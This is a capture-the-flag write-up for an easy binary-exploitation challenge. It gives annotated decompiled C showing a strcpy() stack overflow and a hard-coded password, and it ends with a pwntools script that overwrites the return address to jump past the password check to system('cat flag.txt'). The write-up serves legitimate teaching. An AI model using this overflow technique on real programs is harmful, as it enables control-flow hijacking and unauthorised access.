pwn - RUN NOW

Run run run!!!

November 5, 2025 October 15, 2025 Easy
Author: Hung Nguyen Tuong

Source Code

main()

/*
 * Menu loop of the challenge binary (decompiler output).
 *
 * Option 1 is the only path that takes free-form user input: a line of up to
 * 127 bytes is read into buffer[] and handed to quantum_entangle().
 * Options 2 and 3 are cosmetic, option 4 leaves the program, and every other
 * value prints the "Invalid choice" message.
 */
int __fastcall main(int argc, const char **argv, const char **envp)
{
  int choice;       // decompiler stack slot: [rsp+Ch] [rbp-84h]
  char buffer[128]; // decompiler stack slot: [rsp+10h] [rbp-80h]

  setup(argc, argv, envp);
  // The PRNG is seeded from the wall clock; in the listing shown, rand() is
  // only consumed by print_coordinates().
  srand((unsigned int)time(0));

  for ( ;; )
  {
    puts("\nQuantum Teleporter Menu:");
    puts("1. Enter coordinates");
    puts("2. View current coordinates");
    puts("3. Initiate teleportation");
    puts("4. Exit");
    printf("Enter your choice: ");
    // The scanf() result is not checked: when no integer is parsed, choice
    // keeps its previous value (indeterminate on the first pass).
    scanf("%d", &choice);
    getchar(); // consumes one character after the number, normally the newline

    switch ( choice )
    {
      case 1:
        printf("Enter quantum coordinates: ");
        // fgets() bounds the read to this 128-byte buffer, but the callee
        // copies the line into a 64-byte local with strcpy(), so any line
        // longer than 63 bytes overruns that local. The fgets() result is
        // not checked either.
        fgets(buffer, 128, stdin);
        quantum_entangle(buffer);
        break;
      case 2:
        print_coordinates();
        break;
      case 3:
        teleport();
        break;
      case 4:
        puts("Exiting Quantum Teleporter. Goodbye!");
        return 0;
      default:
        // Reached for anything below 1 or above 4.
        puts("Invalid choice. Please try again.");
        break;
    }
  }
}

quantum_entangle()

/*
 * Copies the caller's string into a 64-byte stack buffer with strcpy().
 *
 * This is the memory-safety bug of the challenge (stack-based buffer
 * overflow, CWE-121): strcpy() copies until the first NUL byte with no
 * regard for the destination size, and main() passes a line read with
 * fgets(buffer, 128, stdin), i.e. up to 127 bytes of attacker-controlled
 * data for a 64-byte destination.
 *
 * The return value is a pointer to the local dest[], which is no longer
 * valid once the function returns; main() ignores it.
 *
 * Fix: use a copy bounded by the destination, for example
 * snprintf(dest, sizeof dest, "%s", buffer), or reject over-long input.
 * NOTE(review): the page's "Mitigation" section is empty, so whether the
 * binary was built with a stack protector or as a position-independent
 * executable cannot be confirmed from here; verify with checksec.
 */
char *__fastcall quantum_entangle(const char *buffer)
{
  // dest begins 0x40 (64) bytes below rbp. Assuming the usual frame layout
  // (saved rbp at rbp, return address at rbp+8), the return address sits 72
  // bytes past the start of dest, which matches the 72-byte padding in the
  // writeup's script.
  char dest[64]; // [rsp+10h] [rbp-40h] BYREF

  // Unbounded copy: everything past byte 63 is written outside dest.
  return strcpy(dest, buffer);
}

print_coordinates()

/*
 * Prints three pseudo-random "coordinates" in the range 0..999 and returns
 * printf()'s result.
 *
 * The values come straight from rand(), which main() seeds from time(0);
 * they are unrelated to anything entered through menu option 1, so this
 * function plays no part in the overflow.
 */
int print_coordinates()
{
  int xyz[3];

  // rand() is drawn in Z, Y, X order, as in the decompiled original.
  xyz[2] = rand() % 1000;
  xyz[1] = rand() % 1000;
  xyz[0] = rand() % 1000;

  return printf("Current coordinates: X=%d, Y=%d, Z=%d\n", xyz[0], xyz[1], xyz[2]);
}

teleport()

/*
 * Cosmetic menu action: prints a message, waits two seconds, prints a second
 * message and returns the result of that last puts(). It reads no input.
 */
int teleport()
{
  int status;

  puts("Initiating quantum teleportation...");
  sleep(2u);
  status = puts("Teleportation successful!");
  return status;
}

secret_lab()

/*
 * Password-gated routine that prints the flag via system("cat flag.txt").
 *
 * Points a reviewer should note:
 *  - main() never calls this function in the listing shown; it is only
 *    reachable when control flow is redirected to it.
 *  - The password is a hard-coded string literal (CWE-798) and can be read
 *    from the binary with any strings tool.
 *  - The check guards only the function's entry. Execution that starts
 *    part-way into the function, at the system() call, never runs the
 *    comparison; this is the target the writeup's solve aims for.
 *  - system() runs the command through a shell and resolves "cat" and
 *    "flag.txt" relative to the process's PATH and working directory.
 */
int secret_lab()
{
  char pw[16]; // decompiler stack slot: [rsp+0h] [rbp-10h]

  printf("Enter the secret lab password: ");
  fgets(pw, 16, stdin);
  pw[strcspn(pw, "\n")] = 0; // cut the line at its newline, if any

  if ( strcmp(pw, "qu4ntumR3ality") == 0 )
  {
    puts("Access granted to the secret lab!");
    return system("cat flag.txt");
  }

  // Wrong password: terminate the whole process.
  puts("Access denied. Intruder alert!");
  exit(1);
}

Mitigation

Solve

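Hàm quantum_entangle() dùng strcpy() chép chuỗi nhập (tối đa 127 byte đọc bằng fgets) vào dest[64] mà không kiểm tra độ dài, nên bị tràn bộ đệm trên stack. Chỉ cần ghi đè return address để nhảy đến dòng return system("cat flag.txt"); trong secret_lab() là xong.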

Script

from pwn import *

# Local proof of concept for the strcpy() overflow in quantum_entangle(),
# run against the challenge binary ./chall in the current directory.
io = process('./chall')
binary = ELF('./chall')

# Menu option 1 is the only path that reaches quantum_entangle().
io.sendlineafter(b'choice: ', b'1')

# 72 filler bytes: dest[] sits at rbp-0x40 in the decompiled listing, so
# 64 bytes of dest plus 8 bytes of saved rbp precede the return address.
filler = b'a' * 72

# secret_lab + 120 is, per the writeup, the system("cat flag.txt") call
# after the password check. The offset is specific to this build, and
# taking the address straight from the file presumes the binary is not
# position-independent (TODO confirm with checksec).
landing = binary.symbols['secret_lab'] + 120

io.sendlineafter(b'coordinates: ', filler + p64(landing))

print(io.recvall().decode())